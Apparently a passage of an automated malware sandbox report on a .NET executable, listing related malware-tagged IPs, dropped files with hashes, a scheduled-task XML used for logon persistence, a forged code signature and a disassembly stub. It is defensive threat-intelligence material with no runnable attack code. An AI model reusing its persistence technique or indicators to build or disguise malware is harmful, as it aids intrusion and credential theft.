                                    v58HgfB8Af.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205
                                    https://policy-business-page-service.com/meta-community-standard-s31000650257803499Get hashmaliciousUnknownBrowse
                                    • 104.17.245.203
                                    Audit(s) & Inspection(s) Due and Overdue Notification for Baez Rossy, Jafeth.emlGet hashmaliciousUnknownBrowse
                                    • 104.16.117.116
                                    zwW6sDt6hU.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                    • 104.26.12.205
                                    Belegdetails Nr378-938-027181-PDF.htmlGet hashmaliciousWinSearchAbuseBrowse
                                    • 172.64.41.3
                                    e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.12.205
                                    4z0JKnfc8L.xlsxGet hashmaliciousUnknownBrowse
                                    • 172.67.194.230
                                    Svku9pKypu.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                    • 104.26.12.205
                                    K1_Chit_Form.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 172.67.177.134
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.263677862537552
                                    Encrypted:false
                                    SSDEEP:192:RS00KFA0BU/aaOOJoNZrYVyjKzuiFRZ24IO8TH:g0h5BU/aaJRQKzuiFRY4IO8TH
                                    MD5:E82FEDD489BC876D316732B3B01051B8
                                    SHA1:A84968F3F3B86E75D5024AD82134A6BFD04AD9BC
                                    SHA-256:3A1166C6C8FD88F5CB493091FBE25141F234BC18CFAC3F4101D47E1FE09DFCD8
                                    SHA-512:3BB0F5C8F7CE23F1A392E7CFAF2969BA415C2EB05DDD143B5634C4D358CE26F2909CE144AC8D904D984E0DC0CB61E99B89A0AFF68728BBA6FC436E866DB4801B
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.1.6.0.6.1.4.2.2.1.3.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.1.6.0.6.2.2.8.1.5.7.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.7.5.c.5.8.4.-.d.9.3.9.-.4.4.4.5.-.a.0.c.3.-.b.d.b.e.d.3.1.d.5.e.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.e.3.4.c.8.3.-.e.c.6.0.-.4.9.4.d.-.a.1.a.3.-.d.b.c.2.f.4.5.f.a.2.4.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.W.B.o.U.w.i.u.x...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.z.d.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.4.-.0.0.0.1.-.0.0.1.4.-.1.8.f.e.-.e.f.6.3.9.e.4.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.d.0.a.7.f.a.a.d.e.4.9.0.6.8.f.1.e.7.b.8.9.2.6.1.5.e.1.3.1.8.0.0.0.0.0.0.0.0.!.0.0.0.0.c.2.d.e.e.6.5.f.d.0.b.2.2.5.e.9.e.c.f.1.e.a.7.1.8.d.1.0.1.5.3.5.9.f.7.1.3.2.c.e.!.a.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Tue Dec 3 16:14:21 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):355460
                                    Entropy (8bit):4.141420093224849
                                    Encrypted:false
                                    SSDEEP:3072:OImMPJ84uEqdLViuDFU7pNyDJYCLTgGsoySxuJ+EdP:OIBR84QVTDFEyDJxTgDSC
                                    MD5:722A0C8945B5A92AE987C9A1945B86E1
                                    SHA1:65AA70FBAE5E7E1A4FC215BA1A7DE14C5CF68F7B
                                    SHA-256:971E2D84766709723D0F7A5AF081AFB8A12E8D41C654FBEA505347E627C5C7F7
                                    SHA-512:E62C0270DF4CE14071D0DCC308904E4DF32952FDAF0BAA72964EEB6D2CC2DA8345301478FDD344C280281892E8820A3C05189C47F81AABD21726C48382E16FD0
                                    Malicious:false
                                    Preview:MDMP..a..... .......].Og.........................#..........<....,.......2..*g..........`.......8...........T...........8F..L&..........,-.........../..............................................................................eJ......./......GenuineIntel............T...........T.Og............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):6398
                                    Entropy (8bit):3.7217534616566033
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJRy6Au5LYZobWpr989bcwsfU0m:R6lXJk6A0YyFcDfu
                                    MD5:AF1623FAA26A45B34C5532B48498EE80
                                    SHA1:4D4B8EF340EBDFCA5533CD538A52F05C3F6B4FBC
                                    SHA-256:9E9908C6087139E0889ED2972D6005501D27F9258E7B6E51A119B7D117C6D8C5
                                    SHA-512:BDA072112CF1BAA792043C4F40DE05E7AD8AF7C44656F88A5349EA5666A6B8001D0D77985BA323CCB84DC8BFE685C64F3C8EF77C51222CFF3EC125B13842AD74
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.2.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4749
                                    Entropy (8bit):4.46631290291847
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsZlJg77aI9DwWpW8VYjYm8M4JlJO7F/+q8vYJOUFKPACd:uIjfpI7NJ7VjJf4KEt8PACd
                                    MD5:E3E2D92005C34E3B9AD7BBA796A741B5
                                    SHA1:03C2397FDAEF80D899ECE7E47C265CD60435D0F5
                                    SHA-256:863669A56917B7DEF995FDB4FDD8EDE4DA6ED1C4F4D9A65E0B4D6EF9C754EB8F
                                    SHA-512:B297D645333009A186792B3CD3AC7087B54CF251FE55785B22C6E158DDEA3AECDC3D507E6D5E3A3562EA55BF57A7AB9F7F99372393903AB7DED2147EFD015621
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="615317" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Users\user\Desktop\LEmJJ87mUQ.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.34331486778365
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                    Malicious:true
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2232
                                    Entropy (8bit):5.379401388151058
                                    Encrypted:false
                                    SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHxvIIwLgZ2KRHWLOug8s
                                    MD5:AF15464AFD6EB7D301162A1DC8E01662
                                    SHA1:A974B8FEC71BF837B8E72FE43AB43E447FC43A86
                                    SHA-256:103A67F6744C098E5121D2D732753DFA4B54FA0EFD918FEC3941A3C052F5E211
                                    SHA-512:7B5B7B7F6EAE4544BAF61F9C02BF0138950E5D7D1B0457DE2FAB2C4C484220BDD1AB42D6884838E798AD46CE1B5B5426CEB825A1690B1190857D3B643ABFAB37
                                    Malicious:false
                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\AppData\Roaming\aWBoUwiux.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:modified
                                    Size (bytes):1582
                                    Entropy (8bit):5.100126720598039
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtG+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTGyv
                                    MD5:715161194DFA6CB90F8224C3F1313D00
                                    SHA1:2FCB0D8630B359633A773858FCD464236BC266B5
                                    SHA-256:15624BCFA62C4F8D8272EFA61F9F7EB75D24FB0DD8414DC589A396C7473CA365
                                    SHA-512:DCBE320762281A7AA5CFCD422ED267A73F7ED3A63C5589921783968D11791BF0CBE3E0BC04ADAA8294CD00D7DEF9976DC14BECB37560005C82CE1B1799F64933
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                    Process:C:\Users\user\Desktop\LEmJJ87mUQ.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1582
                                    Entropy (8bit):5.100126720598039
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtG+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTGyv
                                    MD5:715161194DFA6CB90F8224C3F1313D00
                                    SHA1:2FCB0D8630B359633A773858FCD464236BC266B5
                                    SHA-256:15624BCFA62C4F8D8272EFA61F9F7EB75D24FB0DD8414DC589A396C7473CA365
                                    SHA-512:DCBE320762281A7AA5CFCD422ED267A73F7ED3A63C5589921783968D11791BF0CBE3E0BC04ADAA8294CD00D7DEF9976DC14BECB37560005C82CE1B1799F64933
                                    Malicious:true
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):47
                                    Entropy (8bit):1.168829563685559
                                    Encrypted:false
                                    SSDEEP:3:/lSll2DQi:AoMi
                                    MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                    SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                    SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                    SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                    Malicious:false
                                    Preview:........................................user.
                                    Process:C:\Users\user\Desktop\LEmJJ87mUQ.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):613384
                                    Entropy (8bit):7.64116125343091
                                    Encrypted:false
                                    SSDEEP:12288:1L3qZB+Zno/SWqpqqMDz2aH3gId4Ti/lkUNz3PLhRN1YlEUWj8kR:1L3KB+9oP0qTzJbmelkUR3PL1JH
                                    MD5:7E1D910ADE786C9880194CE5E7C66C8B
                                    SHA1:C2DEE65FD0B225E9ECF1EA718D1015359F7132CE
                                    SHA-256:868444860F70D7825D5801E3EBDC8E9F0C5FFE72C3F42A938B7DF98D50E10758
                                    SHA-512:DEF1D3762997F41FF2A045FA6428F30471A3E6825FDA0BF880789A7514C4855E7C4064FD2F1D6C7D211A729B08ACDA2CB40DEFAFF91DD84C467F1EDD52285A0E
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 55%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..............8... ...@....@.. ....................................@.................................H8..O....@..(............&...6...`..........p............................................ ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`.......$..............@..B................|8......H...................$...$\...............................................0............}.....r...p}......}......}......}.....( ......(......{.....o!.....{.....o!.....{.....o!.....{..........%.r...p.%.r...p.%.r...p.("...&*.0..-..........{.....X}.....{.... .....6.{.... .....).{.... .......{.... .......{.... ......+....,....{.....X}.....+X.{.... p....6.{.... X....).{.... @......{.... (#.....{.... .'....+....,....{.....X}.......{....(......{....r...p.|....(#...($...o%.....(......{
                                    Process:C:\Users\user\Desktop\LEmJJ87mUQ.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.64116125343091
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:LEmJJ87mUQ.exe
                                    File size:613'384 bytes
                                    MD5:7e1d910ade786c9880194ce5e7c66c8b
                                    SHA1:c2dee65fd0b225e9ecf1ea718d1015359f7132ce
                                    SHA256:868444860f70d7825d5801e3ebdc8e9f0c5ffe72c3f42a938b7df98d50e10758
                                    SHA512:def1d3762997f41ff2a045fa6428f30471a3e6825fda0bf880789a7514c4855e7c4064fd2f1d6c7d211a729b08acda2cb40defaff91dd84c467f1edd52285a0e
                                    SSDEEP:12288:1L3qZB+Zno/SWqpqqMDz2aH3gId4Ti/lkUNz3PLhRN1YlEUWj8kR:1L3KB+9oP0qTzJbmelkUR3PL1JH
                                    TLSH:40D4E1A02668DF12D6B90FF10420D6760BB66E9AFC51E3469EE9FCD73937BD00660643
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............8... ...@....@.. ....................................@................................
                                    Icon Hash:00928e8e8686b000
                                    Entrypoint:0x49389a
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x85E3D10F [Thu Mar 7 20:11:59 2041 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Signature Valid:false
                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                    Signature Validation Error:The digital signature of the object did not verify
                                    Error Number:-2146869232
                                    Not Before, Not After
                                    • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                    Subject Chain
                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                    Version:3
                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
